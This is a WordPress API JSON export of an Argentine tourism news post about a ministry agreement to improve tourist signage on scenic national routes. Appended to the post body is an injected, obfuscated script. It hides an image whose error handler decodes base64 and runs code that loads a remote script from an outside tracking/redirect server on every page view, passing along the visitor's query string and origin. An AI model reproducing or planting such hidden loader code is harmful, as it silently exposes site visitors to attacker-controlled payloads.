{"id":6067,"date":"2022-12-05T10:33:59","date_gmt":"2022-12-05T13:33:59","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6067"},"modified":"2025-08-13T16:09:21","modified_gmt":"2025-08-13T19:09:21","slug":"mas-y-mejor-senalizacion-turistica-en-rutas-del-pais","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6067","title":{"rendered":"M\u00e1s y mejor se\u00f1alizaci\u00f3n tur\u00edstica en rutas del pa\u00eds"},"content":{"rendered":"\n<h3 class=\"has-text-color wp-block-heading\" style=\"color:#795a05\"><em>Vialidad Nacional se suma a La Ruta Natural<\/em><\/h3>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>, firm\u00f3 un convenio con el gerente ejecutivo de la Direcci\u00f3n Nacional de Vialidad,&nbsp;<strong>Federico Stiz<\/strong>, para&nbsp;<strong>poner en valor los t\u00f3tems existentes y generar nueva se\u00f1al\u00e9tica<\/strong>&nbsp;con informaci\u00f3n tur\u00edstica a lo largo de la Red Vial Nacional.<\/p>\n\n\n\n<p>El organismo dependiente del\u00a0<strong>Ministerio de Obras P\u00fablicas<\/strong>\u00a0se suma al programa\u00a0<a href=\"https:\/\/larutanatural.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">La Ruta Natural<\/a>\u00a0mediante el mantenimiento de la red para contribuir al\u00a0<strong>desarrollo del turismo<\/strong>\u00a0en todo el pa\u00eds. En esta l\u00ednea, el acuerdo contempla la\u00a0<strong>colocaci\u00f3n de carteler\u00eda<\/strong>\u00a0en aquellas trazas nacionales enmarcadas en el programa integral de desarrollo y promoci\u00f3n del turismo de naturaleza.<\/p>\n\n\n\n<p><em>\u201cEsta firma significa un paso m\u00e1s para mejorar la calidad de servicios brindados y ofrecer una experiencia m\u00e1s completa a viajeras y viajeros que recorren la Argentina\u201d<\/em>, subray\u00f3&nbsp;<strong>Lammens<\/strong>&nbsp;durante la firma, de la que tambi\u00e9n particip\u00f3 la subsecretaria de Desarrollo Estrat\u00e9gico,&nbsp;<strong>Eugenia Benedetti<\/strong>. En tanto,&nbsp;<strong>Stiz<\/strong>&nbsp;celebr\u00f3 el acuerdo y destac\u00f3 el objetivo de brindar m\u00e1s y mejor informaci\u00f3n a las y los turistas que transiten por el pa\u00eds.<\/p>\n\n\n\n<p>As\u00ed, los Andes Fueguinos, en la RN 3; los Siete Lagos, en la RN 40; los Altos Andes Riojanos, en la RN 76; o la Cuesta de Lip\u00e1n, en la RN 52; son solo algunos ejemplos de las&nbsp;<strong>rutas esc\u00e9nicas<\/strong>&nbsp;que contar\u00e1n con informaci\u00f3n homogeneizada sobre destinos, circuitos posibles y puntos de inter\u00e9s tur\u00edsticos cercanos para favorecer y optimizar cada trayecto.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Vialidad Nacional se suma a La Ruta Natural El ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;Mat\u00edas Lammens, firm\u00f3 un convenio con el gerente ejecutivo de la Direcci\u00f3n Nacional de Vialidad,&nbsp;Federico Stiz, para&nbsp;poner en valor los t\u00f3tems existentes y generar nueva se\u00f1al\u00e9tica&nbsp;con informaci\u00f3n tur\u00edstica a lo largo de la Red Vial Nacional. El organismo dependiente [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6068,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6067","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6067","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6067"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6067\/revisions"}],"predecessor-version":[{"id":10530,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6067\/revisions\/10530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6068"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}